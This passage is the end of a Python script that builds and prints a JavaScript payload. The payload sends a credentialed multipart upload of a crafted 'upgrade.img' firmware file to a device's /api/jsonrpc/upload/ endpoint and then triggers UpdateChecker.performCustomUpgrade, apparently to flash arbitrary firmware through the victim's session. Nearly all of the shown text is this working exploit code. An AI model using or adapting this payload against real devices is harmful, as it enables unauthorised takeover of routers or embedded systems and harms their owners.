              '\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' +
              '\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));\n' +
              '}\n' +
              'function executeScript2(file, token) {\n' +
              '\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url +"/api/jsonrpc/", true);\n' +
              '\txmlhttp.setRequestHeader("X-Token", _token);\n' +
              '\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' +
              '\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' +
              '\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }}));\n' +
              '}\n' +
              'var xhr = new XMLHttpRequest();\n' +
              'xhr.open("POST", url + "/api/jsonrpc/upload/", true);\n' +
              'xhr.addEventListener("load", reqListener);\n' +
              'xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");\n' +
              'xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");\n' +
              'xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951");\n' +
              'xhr.withCredentials = true;\n' +
              'var body = "-----------------------------1038495162429835808207612951\\r\\n" + \n' +
              '"Content-Disposition: form-data; name=\\"uploadImage\\"; filename=\\"upgrade.img\\" \\r\\n" + \n' +
              '"Content-Type: application/octet-stream\\r\\n" + \n' +
              '"\\r\\n" + \n' +

              '"' + hexdata + '\\r\\n" + \n' +

              '"-----------------------------1038495162429835808207612951--\\r\\n";\n' +
              'var aBody = new Uint8Array(body.length);\n' +
              'for (var i = 0; i < aBody.length; i++)\n' +
              'aBody[i] = body.charCodeAt(i); \n' +
              'xhr.send(new Blob([aBody]));\n' +
              '</script>')

    print(script)

    os.chdir(orgdir)
    shutil.rmtree(tmpdir)

if __name__ == '__main__':
    main()